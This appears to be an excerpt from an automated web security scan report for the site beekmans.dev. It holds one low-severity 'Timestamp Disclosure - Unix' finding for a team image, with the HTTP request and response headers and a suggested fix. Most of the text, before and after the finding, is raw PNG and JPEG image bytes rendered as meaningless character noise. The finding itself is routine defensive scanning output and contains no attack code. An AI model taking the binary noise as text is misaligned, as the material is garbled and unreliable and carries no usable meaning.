ÂO¥ÖSΛµ©)2%b0@ @ –Cèb½ã×4îE!ûžw•ñ¼ý(Zëc}¥ï4J¿ïsS6­'J}DÃ¥¯½«Ï»Û÷ÔPg<t†Tïf_©Î™TªøïÆNåm87d»e¾…òÇàü£§_Åo7 ^Ç$õ[ æÔïä}uÏñøÿƒPéHۏah$OAì*~Ê_RÈk¨ó·F©q8Nj&­.D™û³\_ùiOŸ(ó(Û2Ú׿Iqí[îZíiPEzÞ;HÉöiÈf¸(oïÀ3#Pïy¨ÃÜc$×ë™Æc¿ØïŒôgQ‡¹†é–kT&p¾r\K”7!Ðú+܏»ütz“8¹Fù»÷‘á5øò Íg@߂k8:i_·i¶R·ž„4Ù?ÃqÏ@ŽÀ}¦‘݁FÿTŠñ‘]¨§¨ãDä=­z=@ @ AãD³V­Úµ¥÷*½gi„
          <…!Ú|jý¾¯Ôë¾Ö=çà hAlá° ü7
          ’Rçã¸ÞøìGƒ3>;54ÌC](--]½eʜ2oó•yõ˜­_"4æ2.±Ò ¾çòüee
          Û4¼~ßÓ…J=Wåú•qm€²_EÜh½W]›„sC\ghö¼«Q‡ÛQÞ	¦¨¨$N®ôŠæõAžÇyΫ¾ÇH!½§½ uäF­½¸‰ñÌîü=ÎâÀÎk8¾åÜG/ä •
          ãäZAÏp¶CÜxúî¸-éy·±þí2×óÊ=yitςTâZÊ9
          Ç?z>³Gõz
          @ @ @ @ @ @ ‚ååå+—TÙØB …¦â"
          `‘AN^‚…FǕ"`!A1wúͳM¨ÔI¾çu´Þ%µ›SÁ?
          åå++¥Ú™”:8TþiàÑÃJŒÙ´½lì"°E‹5´ÖøJd”:Ý×úp“JµÝT êFëÖ­WÍ´Q넞Ùß(s†—òŽÚ—·-ÿ’›D¹@ ¨þª«®í+_njxj>çJ
          •:*w@ Ԋ&™T¦˜¿€CÇdŒoÁ£¿ZßxÞÆq@ 4&eÚûÊÜÝtjFûÖ÷ônþ•ñ<ÉM£\@ ¨ÕVµg^þjcñù
          þ¿&£õòÒM 
          F»V­ÚºŽ=ý¢¯ôPÆçJ¿…ϸ«mœM µ ¼¼|eðe)àÑÏcå|ŽŸV÷s·ø8›@ g0ö¼›À©ß‡ÊÐ`üe Ô%Jµ#çÆÙ@P
          nÅ[Z]F'Ìë-xô+ðçuƤ6mÛ¶-½Œ@ ¨Âp
          _©}|ežÅ`2ß+eÞÀçaÆÙ@PÀ—).›†b>*6WúiÕ#H§×³ Óaà{Þ5ÐM¿sc¥?Ǟ¹nÈê7@ ¨¾ï{àËóÁ›ŸC/ý2.PêrЧ褁@ pƋ5ÂtcƒÚÈó¼.WŒ1ëSJ<o_ës1ð==Ëρ§>
          ”¹ïšä«~<ËdÙA*ñ1:ey @ X¡J¥þ¡&ÀqeÕ9’ðcàåÖ{‚3o‡Npc¥~öÓêyŸñ7káÑJ¡Ç\:.*+,\­«lì$VL4%§Bwlþ+Mø¯:/&|i<³ôÑG}OM
          Æ_ƒWo×îEݍW3EjC?å¯Gƒ‰xÒ	‚şø¾—ñôÝoê¿ðù-¸ó!ꤺXo&ü)ÿp„ZïxÞ$f@~Ä@ñ=dJŽL¦@Ÿ
          ™
          ™*mgèÀ§Ò?SIOòÅÇ$ò=Ò+X¶ŸÖ/3raaájñ©`…”éöÆ3ׂó>I¸/–„¿sâủȵsi,Ž„KՐ
          äÉÇ£”é8fŽÿ Pê² ¨h‹Ò–-WO/+hì`˜	íyg/:îs+Ûòë§äTȼœêôÓ¹î÷´;&âßÇ9~<M½v¸·ôàòøô@°Üâïñ§þ5€.êø3zé6ò#øó|
          
          Á?%¾·½ÑúÉPéñmÆJq)J>‹a‰¯0°p€á@ó~ëÒò3Že¢l(½tZïÅÝXãSÁ
          †“Òêr(æƒóñ`Ž8¾NwN‚|ýÿ§â]-oVÈ¡äh£ô¥Ô­7+--ƒ±@ Xá@ƒ9Õ׺;ôÍ×È}äÀ|ܘ9Ôq©§¾yu~¯S?uezúÓÐÓ7Ó/>½@ ,·ø;üI©ÁŸ.¦±ð§@ üãQîûkj­KM*ՁF¾%Ì'Üw¥¶Rjo?¥ö	TЩ4ío‚ß7Î͛+c: ìM¹”º,•jSÊ2j@°BËñ\8ðù¹’,
          ô=o+_©ÎAZï	þݙÿ“'‘‡\ZƒO™FÁ9Ö‚ Mcq×®]…KÁŠˆ¦äÔV­Zµ
          =¯,á¿ê¼q|É
          Cñ¹¥I›À©{á˜ÝK|krmF©
          sòWÇt¯Ä3âÌ V,ò;¸rsã™9¿'bð§@ @ @ @ @ @ @ @ @ @ ,4e̶0Ïےñß3©T1gb*•já§üõ\ÌwJ:X×÷ý5™&Ë”RÍÉcŒ±žÛ˜ñÓ¹¡Rœ¼ÄQVVö/ðæÚäOcӘöžç­'´+*jé§ýMtJoË<Ü'£cǎ+ÅÉK
          iŸ0ÿi·GˆRp
          ›.ívK1yä.îYQ¢‚½3ÊßǤÍ6ÔÁ
          k0ÜÙÜÐ!NŇ;~c¬àÚøÍmn.!÷¸}1|=rRœÜhQo&¼Ï<¼vpüÖ¥ÖYÚü.K
          $7aSdJ‚¢¢-B­wÙƒÇ¾Æóö«.Ö{ÑÀ@rL¥Ê¸Iœ3@ÁŠ(Ž«„ÅÅ)n®ÁÉ´¯ü.øÜ»:/†žÙ/æÌÝ HnmR©öZkUXX¶Z\ÔRڔSxõM¾§¦žîîÆëa:êÚ¿½™1¾¥O¿F^w‚$b`lLPÅj;pÜKÆSÓÁiC|­Ï6EE%qò7mB{è+ý¼ÛÁ_é¾4¬ÄÉ:Þõ®ýi½übՙúvœ¼ÄѐöÑmÚ(?¥/B§•`,@ž¯1\Ðn)¶£@ðO
          °Ü䍺ô±]ŒçæÚûT×'¡^IAþ]ÁÍÒHIÝ..nQà
          L:½S tÏÐSß°ÿ‡Æ“Ñf4¸ê •ÚÅó¼-ÁgW£Ž3JüÐâ÷ï0.t‹Ë(@wCÝ†ÕÆo~qqÆ(u&Žÿ(æ Þ¸ŽNqr£E}¼iÖ6­qí‡i5 Tšíòtè´٣¨¨¨eœM VÜUJí¤½‡@z3Bm,ïðýÕ¥GC&@>öÓæ¾ ­ A%.N V@i¡Ÿxzf¨õO6_ÔäF=
          æ§È7Ê)ÐJ
          †bý
          ~»„ý¡èg–æ.͜Tx^X†ó_.ÿu*u"w¦fzäñ¡/‚’û
          JüA:½®;X ü#±¬
          °zÂùžz2	õ}r9;N^âo¶1žÙú$xösH/Œãd÷b¿½úÍÀgÏ0­wÎõ@^ÒhHû„mÚÒ8…´‘ïuÜóø¾o»V­ÚÆYÁb@à[¢o=}ñWÌ¡ÿ'|ÝlTU]2G”qBN֞>ˤL‡ÒÒÒÕãâþ6‡è²×¢üI¨ÏXðÖ¹à&ŸFí²²¥ÿU\\œ®ø?ßóB}@¯½õï•âø­3~{¯6~ã
          7ðIwäsгZëmãäF‹úxS­©š›tyôÅhŸ‘þïîoy˖-ùþA£É丧G!Ó0p|ê§Ô‘ååå+ÇYªÀ˜µ[g”:ƒÄ[@~Æ 1ß/à@³˜Þ|
          A£
          ½F©ÓÁqý 4_G‘8¹
          º4[
          vhLWä½ò<8’ÞßóX”s!¸sC.ŽYbÈ1_ónEƒñÒ4V‚åËÚ»°PEj#?­'Ç­øZﯺêÚqòGb0¦±ò™¯ÌsÕ
          Æ£=§#ý‰¥m0^Öí#À…/püª'¢/¾
          ð¤ÜKmô:
          õ¸Ü0žóþŒÖ‡ÅI
          Fäa\•ßÀ‰Ù|¥µ>×ڟ>|¼ãäFáM@ ¨†cýH-]ïÇùõijä›4ä{Å?­_†Ò|h*Š‘™ôdf‹€KqÒzOz4P2Êß¿í¢ƘõÿŽ2ãZÓcŽá4XËLÊg
          ßóvà’ò°8La0sK²ë
          .ôœfÌ&r}åï“,bùœ0®—'^{ù„ü(QªŸNoÍ¥ž~*µžï§?´S¾úòwæç›Þ¸@°@ƒ±3š(՟w3¹&N®ä4L
          ®OR)Ÿ	废ŸRûÄüÚ,ÊU‹Ê—µŒKc勞漧=¯œåpÒBn$—¡Lã۞WÆ%×
          1pó¸½SÀ³ÇA®ò.eçµÓ›™K·Éwyøz{ÆÃ+*jÇ¥}M¢£ª"‰G8x\C	ïÆ¡]ô|ñ¼-fɕ‡O.¯o¨±ž±èXãuÅŸ·.ÁŠö'ðÔÓΠA¯°jcöiö#“2í]ÿp”3†#ûÄõåDOÂ÷ÝØׁžT›Bׂ®ÍÂ6!
          Ðà€2öa9,úxI'«3øR®¤mI+æîŠz^DƒÀsŸ¡ï?ŒóŒc»@ßÚ$ŽÃY£Ï“_É1	%ü“9–åSÇ£.F¾B]6e¸Ž\Î]œãÒҖ«Ó#×¶þìÂ:äÖ)n\—¿µãÙbŒ-àn֍ºj¬Û6#76´}ÀÅ4‚4cÈùÔQÉûuÅâÄy’°%;°íòñ7ϟIeŠk–Ïq‡÷˜çåõðZpì¶(gO”›]ªÏï¨×îäc>Ku•+4VÔàW­OeŸ“ëu'ûÞöèߝØWk[¹F°ܙá99×ßqՎ÷ØçÀ[Ç ./€8ïÿõ¹ýî0r7Êߊ<‹bš²¿ó<ä%ö{þaÁ8âóxú9…ú_˜ÒÁS'¡L®^þŒy".Ôã\û0F©Ö¥¬?Ë×nP›>çt`¤Ëƒê×KîBþöԉə¹|ÄïüœLGÙ¥N'Œcó¼@Ø+5d\a>Ëy}e©²8‡èÍèùïRkübžKxS ,·pd›ãa2EÚ½i¬mr܌$yÝéÑp~0ž~Ø÷ü¨„Çyˆ&$vgô@y Ý‘ÿcÈ× ã/q.·äç/ñ2~„w«3Ìb­kr´5H®|óg´~ÐPœã+”õ¥+3»¤G
          ÅçÐx z	r	_˜gӄƒÓqÜPò{ãØQ4ö ÌQ(c—…Ú|‚t†æàÒszÞÀD—“ÛD§ ü§1hzjÊùåg[ ¾ŸóÚñëèêN_áó}”y#òîLå=.N ,E@ùÍg0.“‚&J•µ1iu"ú÷Ç®âx|ð_(|­ã<‹“/k3ÓàÂtpüíPR‡ãó-N\0ø4£^û㷞¸^zÞQšö7q…ÖŽ¦PNwDYÏม~ZÝIEŸÞ%qº3()T‘á9”¾3âN=\:×ßÿiփ^Ùï£îA±?<_Ê뉋r@½:ƒO‡àøù1Ÿ‚óÍ$÷¯éŒ%zÚú”óäCÈ5\ZϒN÷‚×p¯…÷×vŠR…m&ñú+4òŒs
          4C÷;}ã
          Ç+JOÅgä[ôß±øŒB™QORԓ\<\òO_pÕq˜èâß/í©‡e<³›Qæ6ôgê?Ž«pþá&
          öqV½¨çñÅM9xÇoˆßÎp<ªÍçÈScçA*qÎI8÷”ƒþ¯/ÅɶK´œ,ÓðIû‘H'¿Æçg8n„«sŽàØ/‘þ#dÊ!'Má9ÁGYƒ09|
          ÆMØ4"@®Bž7‘w¤++Š}œ['pµfOÆ÷ðýk”O}ñUðùiäoލÓú
          lŸKL*µ)ÛåtFþqž8©ß%WŸ'ã·ڏÆôۘù¾‹ùûÓl£û?ŠŸ8Wä=?S¬7C½èüPeNAŠö¼cqnÖñ”óî3¯ùü?™õLʍ¾ë‰ø>i/ózi|©>.Y~Eß5Z-´ç*û8ôÏnèWƒPu†
          :5™u@hת][腇¢¿ô…Ð <ùΡñ˜}úè…èÿ¯¡ÏMAšù…ý+£ÍÇ¡òÑçô­äYöQðÛî~œàø¦jŒö„ßxðËcLs/ièõԽ췡ñ'‘{ÈAÈ[=íÔÇxOƒ»£ñ“Ç!} ê“_Ÿóôې»¨›–´mۊœE}çßù¡“ãXrCµù¿›[S_Vj$ä]ü?òÊúå?âôÔᛣ¼+פԅäq­3Ûâ†|ûyÆg´î^Û…7ÁŠ
          Ƙ ?²¢BrÁ$[©AæÊ¿#–N©çdßÓƒ0i$ò<0$VÅs×måyG#?7S„BMG¹¯`8ŽŠœÍÁ_Õ_ÛW>c!]Ra=^¥"NrD–ì@ÈóÐC—„
          ’&Ñ~²|DË`0ú8«‰ƒL¦ãN¾CùÃp
          —Q±Ž³¹r3©Tëu877P
          Â1dÒémª¿Õ¤‡0®ÿ$^®mÛ
          ù{„©TÇܼIû"ý.:äß2Æÿÿ¿@£Ñª¸ö8«C~ Ü#CO¿ƒ:ü‚óD;œÂ‰‰¼@°t±Æè¿íQÆ
          à,LÖ!ž¾	ý|£8¹ÀyÂ-:_î‡úÒs¹)½”*i‡òªŒéIÁ2è́sÜÈkÂ9^ÅçiÜ „iêr(Ê
          ‰²»Ñx›sáx³¸˜^—‡?@^ÆsËÆ¸œ÷êvêñ&êÉìgh”¥òÊ<QÖèE 1Þn(ãÔy®íkH/L~¡wLœ­ÀML”~‹öq£&|ÿ‰ÿó:ÐÖ٘«ô¨¦§‹ñôµlO¤ßIo‹8¹8!_»IÚ«7'Y4XÇÉÁ
          úÆèï|Ñ
          éo£ÎBŸ«„.EïÕÔ³âlY”xþVèçw ï8”õ¤'¸‚›¹—/èÇ;€^Ëzýíðdõ3œïLôÝ»QþE菛ãç*ä§ýMPþà–¯¡‹¾…ºä]âÍk0Ê@_S¯£¬ïÈ-8æœc÷˜3«€z낶xõw>òυôÌ忐c³®‰:m“Ò–¥«³-ð;_ g£I=Ž9œ³¹5*%‹&Ƥ6
          ”¹yF²íQ.…žŠÝsïS‚†¶tûݑ'еœÖ=qMôtc	9m0ÛçœÊºâü÷+&玎¿£°îEyŸãš˜ŸÎçàzÚÅÙ˜7H§Cž¡Ð‹ÿÊøÁ,ãòzѐ«ï–POmŠ´›x-(o2žÕûl—ïþ	>øœÂx眷~fbÏUôçZ]œ3„sHê!ñJ§®Ÿ]¾5}
          ú~„yй*6•jþq~û2ýþžèKÔÃ\%bx^ÆG¾KQ—ñèƒ#ÐǏ*¨æDå<Óµ®íQÿÎ’Ây4k}<ê0é_ûZõgn'gŒõÛùô¹júWS։S¤³Ìɸ~èÀê
          nH]}þO´ir®¼Ïƒg¾çõýms·®eÅG}¼i­m¢TfÔ9Ù#d4õëØÀKб®¹ð¦@ Xa@²tÊaZõ™L„2ú3ˆŠ
          õ´P·ƒ>þÿ+ôô·ø¤Gí›à‰vË'oÀ²ˆ
          ´qr¨ô' H?ú€àöª>å'	 ¶8ÿÈ ­0`øÎs"Nnêz¿EÚO0]Ì7qzíèØq%ç…ç™C¡Ô߈ã/JÖ×ÅÝÅ,¢âc”{QCÊmr0"y{¯¢Ì os€E™«!¹	I™Þ×Ð9 |zŽtÇ @µZvØ
          Í@Ôå'û
          ”ƒƒ9PÆÉ`)ýw±Œ¡°r"xüà¦ÏÒ8Ãåp4Ɔ)sÒâàKpE7ÕºµfšŽbÔÑk-¯Á×t„ž¯ ít^+ӈdwk”÷"Êàʌ³KÚVU\	·¼O©;p<”bu»ã­h™³Ý¸æS¡Ðrc”©ŽËÒé=âä:¡uQ)øþjCo¿1œOFšá÷ȵøýðù$^'ÎÝ>:²*0Fýu<mð.ê8’Š5¯•¿ÇYˆ¦e…e«áþ‚ó}‰±ðŒxÕH
          C¹@°"‚œ„g¿Vƒ1¿³?£ßõGž/iH€.¸KyyA^®êXÐq¥Ò"]ê§<0¨³}eørߏ¼êh| ÿà<sÐ7ù"ÿBKéAæ
          ¨\Z\¥¾Õ–x—”¯Þ0ìó<?ÎÁ—û÷`bÝ¡!çßh”yŽŠò§€ÃžaÅÉg0Në'øòŠ.äMZ_+|ÞfÞÉ,/>´vt,X	ç`èêÁôž€ïU^ø%¨¯}DƊõ¤'"½îÀ“®÷D¤½…óŒÏ?[½¬“Ñn«ÐxçãV´4&`q)87»†íà<å¸Y,æG©ßǺs^ >\Ò}ê9×2ÏËõ4žÅÉA£¹
          ýóÌ
          ô‰J<ó“ 5V8$‚9¸[­>ü”[yÖÖ÷PŒó8åjX“RG¡œèã¡ÿ
          @¾¨GâØoЯޡ^Gþcþ\pumlðÌÕO@ÿªbDä<µÁü–gõ?Ú
          ÐW߉9èp\–?Ðp‹28ß­SŸƒ^¼.ʺ\ÄÕ'䕞hÓm¢qµw
          ®u4ÄyD×"¨Þqí—o_ÂmÔ÷‘ÖõÞ+H–4ƒ†ürâJí¢¿¤5$3i÷Ċr­1z’2Hݽ̓ü™ŒrqÞs*ŠM—¼=Íþːq>.¿›‚ÿ÷!YºÝœ1¡@Ú8È74üÒð‘éßD3gÔ !
          þ¿ÐåÆñ4OF]£Hé‚¢`’?É=mtðd:òÎ(¿K|h­(**Úuyĕ©T?Ôçø|¿@ Xr aü³xÆPœ!ôšÏxeŒé@/3†¬Á$}qðåŸäKÔuo¾+*
          Ҙl\2'$
          m]cpwÖ3hJc©öPg.gÄäߏ-+,L”Ò¦ñR³‘F¯i¶Í!Õ9é; Ný!àº&ã\O‚Ç8¾Ôwmûð:ÈŘq‰"—òeÜþí½ökQAŽËåµ´ö*)q1÷òÂÅbvá0Ô(—÷à“Zàéâ<¼•:“²^8—
          Þùwî³@°<£>ƒq¸eÀŽÉè37Ö7ñtˇ=ý?ôU†áú}ú¾LÊt WP_DyìïûÚã궙†¥¹
          ¿èâ×á	•¯¾¹1—éq¦é]æé—œnÆvÆÛ=N®87Ws€«Ìc¨ÿh|>‡ºm'/¤ÁØ<NC¶‡jÛ¶êr	~'_ž¾eeW¼Õ‡þ~¯þv¨¯}€wsÆêqÞEP_.i?â\ä5LJÕÆØÄù_Äñߣ]ÞÁñ'”µmK£—sÔ@ûÂ\v~U‰*iW[¬kBkÍ ¡\Žýr|?ã9âd Q#Ûkñ\]Xp5û(ʼ‡üVêÎÉ+ôôk\Íg«ö½|OÌY³ÞÁÄ¢ŒãŒÝ!Yƒq>oT¸¬}m¶Êy۝O뗜N—ã PpŽ]q:/Ô"È¡>Þ¬Å`|Bœ\ÆS¦±XxS ¬ pc, §hÓ;(¯ ¾£Úãw±*s"H‰ñ’èyð¾I«Ó«/‘ÎIÑ-ÿðÔ3,/Ԇ=1~Ð c¤Õx‹ZE\l&õFFû/ƒ(_A½n)ñ¼\=‹L	ÎʙàHZ™+4¿¶Í9’löM«ÛœÆW.Âl3ÔõS”3e<«íø{uƒ1ÒÞÇ@^¯‡ÊcŒÑ섟g䛂%‡Åe0Æ1iu;&£Pyî|z„©5#ÎÛÍ@9ÿ-6¾ä†ºH—‚Ë®çpÉáHNÂ`ìÀ卨۵¨½WžÂ¹
          C·A•2)s
          þÒÇsâ“ÇsÍìÞ2v»ò¹ÌŽ/À†â·ü׋»öhñ&&	/ã܌ww-'n,ð¼і¬ÓL”ÕçÙ¯>…œŠ6êy0ï#Êý˜^Ý4FрƒcwÇïo✣}Ï»*S¬7 wLJ
          ÿä›(×f0f?j("ogô¹d¢Þ3Hé]Ðï²1rÙ£<êzœÿUä‹:ÌD^rám¨ÃÎmÛ¶­a@¨obÏEøí@”ÜÀ˜„/0øÖrŠRÁÞF™GQ§Q‹j0fu:0¬ÚçúûZŸÍ±&>¬^Äü}=„aÓúÕÊßÓ`ÌMœ¨ǞïB*QÆK8×Þu½˜«]¬7ÃùŸÂñßš!áÔi|yÊ4z¥ç>¸\ú¾  O»ƒó€íí+n:­¹\í­{¡N
          ¾ŸÁ²DþX‹ÇC]l
          §c)Ý2ÜóÊÿ}¹ÊÝ£º8A£5ףϑ§p†ÎaÜüž<_mטÔQß%n0F~ŽwláM@°b †Á˜$2¢RËt¦pò}a0qéo HÞ ¢N ºÇbò’ï'74Fpé	w"åd>þ¹€ÁîQæq¨ÇÇ I~¯Ðx»s)qœ¥Nðš¸k,ã±þPÐùf²	˅òÎø¡ô,›‚AñÙИÝéýY7Lqñú ôq­“P¿q(熳 ÁÙÅ©+ŽÚÒ`ƒ1
          L>7mªÇ #–ƒÁ¸‰ÛÈÎó®EßD«ï¦w+ãÑ–®ypÓÑEç˄·£ÆîEX•	ÁÂŒéQLã)—‘£~ôü{õ;ãøR½z.nq7žÙk,·Ó|Y¦Ô³¨ÇDæ×i}X˺7ËE“Ø3¸Œ/)“k#ðOƒ&Ձzû8öL¸¢æ)pý(÷ÌÀ3·Ê0dÅh-ãìÁ?
          ù&ʋÃ`\Å OÔi$Ž“kœVŠ:œãsc ®NàrNtLvóÉú&öþZþš¨k§„_ñ«ÓºµŒã$ׇ¢vE-Á-‡ ÜÞ8v¬Ó
          s&äœTÒæqÖ×m„Ô¶-1NriŒA¯Í‹ôJ‹«hóQŸÛ!Cqí¯ÕÆßõµO‚*÷'­g¨!z€ã~—ãÿûPGÛiÜ>ŸÎñau‚/ÜPî!(sÚÚåi¶õm¦S·_Xøº†uÇ`¹@CûcДûšñäÍèãQæKàûé]Œ¾<ÊéfJ]]o³ê}jy5SWf8甐c‚ÖçÖåÀV
          Mü”Úõø°¶ú&¨ï>Õa0v:0Wâø‡‘&¼)VÔa0®>p0–ÛÙ jîÜÿȆqÓb,¶8KÈ»JÖ{¢¬¾ ½ÉAAZ]€ß7ÏYҜ³sù3Ò7Â9.E]FOFï8SlÖ/o[îýngT‰„2Üðn:üßݤLûvEíZÆÙª€×ÈØq ֋Q—7ü4c…šûq,7_qÀDă~2~{å2vÐ –KcE¾‰
          •é8>ã¿è{ÞDƒAu¿–ägc[4gûâ¼b0–3äŒ!ƒÀט¢¢:ûaaaÙj.û0;M9·á7»»}9»Ùá&拃/Óæ
          òËC¶&\‘ó58†q]ü‚<å8ÏC¸†ñT8SîÝÊÆ­UFÛàú÷ÄqŒÛ÷>‡eΈëY%þ}´ùÚ(sg(¸×¡Þôa»Ý…ÉÂ&q–؃cá
          Æ@3JC©#p<CZpçÁŒçyÁ–ù&Á?ù&ʋÓ`Œþ<
          º×ãAJíÊ00|ÙŗgäÄdBœ€:¸ãVԇ{CL„\¦Ã wåWX“y0à Up~nêö<¸â[Ôau+†¦¨k98®5Í=/P.
          ž²+q®§è%gYHƒ±~Â/ö¶§AÄùÁº¨7c+DZ“ñùbà™cÈÍùxŸp+ÖUëkPîÇ(w*ÊxÇéªy<j ªj0v+ä:ÑY„çÃõ–ãxÜgn\Èð@êv´ßö¼wñXSaئ0Z’­®ƒNL熺ë‹1n¯\£FØ¢Ån|Çà‚lÄón4æÐxþýU£xî
          EiiéêèÑ—ÑÔôÙЯ$_"¹	9úÎó)Ò+Ö<}h»Ví²{à,¯cþF}yŸÀyÁ™æ^ãþRoŒ³Õç÷(óА/üièãúÅl0>1Y•æB̓§…7ÁŠ.ô‹ýÎ égA¢œ8ƒüt·|$J¢awټqé4óޕ1fG޹ÁIœ•ÒjÈہ“päå&BTøßI]o”:
          
          ê~ìQ ñþ
          ˆì”9Ú׆
          ð¥µMDüµÖZ“KåÜdB©¡ Nî¦?˜Ëq޳¹A\R>Ê8åމ<Cð‰F
          Áz~ß²º!X­¹fs.•D¢M¤Pg–‹¼w㷓0y؟;Ö⼇Ú»ƒÈëqž¯ñýYÈAñ ì6% ؎®}ÓªÚxòÌ(ß8¹V¸Ðóî¹G@âüçôkl:%–Àa%à"nzô.ú!7MêϾ˜ðKu¡"eìðǛèëџñß‡ãØ»Ðw%‡ÆEWÁbâˍãâÜfO©7ºÐÜ™=Mı§%cæ_1Noƒø…Æ]ÆUç1~šqHÕ$†ªhhè\Ûú¾ö.FÛ¼‹:}ãٞ	¯v¯oò7~{×=ßi(ú|}9òVák7ið<zþníï+ÿ@*Åqr½‚TˆsœïÚн(õ^ä8'ÿH¨h5TôÆ^äæ¿çæn¦óṡ罃>É»ºJ‡8¹V ¬½1¹þ:S÷çübÕ%ÚO. ÷.wéåMzÓÉଇ¡16;_Äߝ/æb¾úæ{¡nX%6Ðv‡¼†sN†Œ‡Po;-á×DpÞ³Qޛ87¸ÓãïyàáßPÑÙM›È9àžƒÀ…4*ƒÏW(N&OíÅë¦î‡´2žÙ:wœé‡4–hû…|ù>HÓ£o¡ñ¸J´>ÜDt˜ç‡Úpù9õp:7œ
          ~¬Ò¢¡í“ÜŸ¤ž¸¦.¹õä>¶ø÷
          ÷ƒãŽgÞàX„û–ŸÐF'¡½By£Q7ò÷Ó.ÑZoFCW\œÚ®9êÍ¡¾Bý*xÍt©Ëð…©ÚÞÏÞ,БãÒKèg³ÑG¨C=‰þÒ-·Ÿç
          ¹B§#ô—
          Á=;â˜kqüH×g”zr`u½ù¸—Ð菽‘ï§ÐS߆nsd!qštm†>ÉUUôÃêóþ|ý­N~+®Ê;ÈM¸Öaä Ôµ/α}œœETNÃõ9®ÚC¹§¢Ì¾Ïœ•ÆPèQ}£öc9hƒ3™†:ŒÍhó{‰	¸‘ÿO¨ïܛçÖ7A}¼Iƒq*eÚã|7#O­í'¼)Vpi^ìA@RïÅågÆ3»Öáá€Á¨=à@|TôŸÏP	÷ýõ6Om^c×i¾IóSþzô¸û<caöÂ}$ŠW©ÌGP|S’+7ràX˜M8¨€TùƑF”WQÖ,3[>υëâ¹Q‡Cù6ßÛ½\”¬ÌÁþ?roÚ|èÊueÆØ|å>ŠúvËoFƒJ|xdÛ7­Ïe[Ançr¿8¹VÄíñÈ&/WcàÙçà²o@°”P~qʬR×CÁëžä8f¿Tð‡äpÃ0\¯«ïgÈ)q‘ubqñ¥‹?Iï=eއ=^ 4f®ñ’9z~àØã–_Àý›†à2íyg1FüsƒAŕ|íêÎX¥	¯fÛO½‹v~mwM]|ME:ª»êÍ€ô©®¬×wQû½ŠºÜ‡ÏÿÒã1Nþ‘`ÃäõBpFOè·p2›Ë/™L¦ØMÄÁÔeЇN¨oÅ‘ôWèT/øiÿ\rHje¾·Ҝþ–èXäQLj_…\‹‰n¥Êh<Ȇ¢H¯¾õõcSh€Á9.Âyɯïeù5ËC\έû£ÜY>ò]ŽÏ{ùÇg7§#ç0ì~ç˧qÜÅ%9éÙë†îž9áÐò…ÃH1Žz*Õ|}®ùn´_¾_µN¨N=ÁyGqÚîZW§Zø»¡íÓÐzRÿ§‡aôbSõŽÆ¢ªúvCø›ˆç{pÎÁú¡-†>¯ëÚ;„ƝêíMì8Y hÔ@?+E?<}§/úÞÃ3\û^1‚èíz6úæÝê|‰spö[:ÄÅ×¹
          ç¸ò2õWíé³ÚÅ+ÉÂ6a!¸õHô£¬~X}ޟ¯¿-¿qìÀïûàšiXí‰qã¢\þL”³°ú\ÂG8æ2Û§ÆüŸß©cjýd¨=:~°-z²=MŠ¡È‚ò|<Wo’£Pçúu]váM@  ‘ƒsÆ[æäÂ%›\VHmʹ@ @ @ VL4	•Ú(H«Ë}¥_ö•zÿŸä5|Ӂ@ @ @ ¬ hêyþöÃyú¡@ëÃèmŒß]˜@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ ԅ‚‚ÿô³.ñ6¦IEND®B`‚
          Evidence
          54444444
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        52. GET https://beekmans.dev/img/team/Pim.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          11111111, which evaluates to: 1970-05-09 15:25:11

          Request
          Request line and header section (240 bytes)
          GET https://beekmans.dev/img/team/Pim.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1148 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:08 GMT
          Content-Type: image/jpeg
          Content-Length: 446592
          Connection: keep-alive
          last-modified: Wed, 15 Sep 2021 12:01:39 GMT
          etag: "6d080-5cc0775f24ba0"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: MISS
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wsgNqy558NwBtv8SsgLGYcv2pwXG8mi7xtVa6mL2hOf8udSOL6Pho3iIPt2WwTaB3vliudOX6xPcotnITW9iQU3Sa3%2BOtRjuvaHzaOYq8G7USEveKoWZTh1tshzKqJw%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47fda074c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (446592 bytes)
          ÿØÿàJFIFÿÛC		
          
           $.' ",#(7),01444'9=82<.342ÿÛC			
          
          2!!22222222222222222222222222222222222222222222222222ÿÂÐÜ"ÿÄÿÄÿÚèT³©›“8Ò#9¹•00t†"%HCT•"JDŒD†ªÍqEÔÑu6—qi¥ÅÕÔÖ²Ú5’\ÜÍ«.¢³ªiÊÀ•&©MM‘–±sÌ´àiŒMÂ˨¹[O:M©R©!R°iØÀ	¤*D®\‘ÈÓ¹§5
          §4Ú©]i*D‚6„h B*„ „4-X °hFX4Ù`-떲ôoÏÑÏ®×ϳ`(Å­ܧh\ch2f3-K,bl±±$ ’Š•A
          ąa%;&Šl(ci•QF—Ù¦™Y­ç¥—QVSF°&õ’Ê–h©[tYT’"çR'Eftãs“
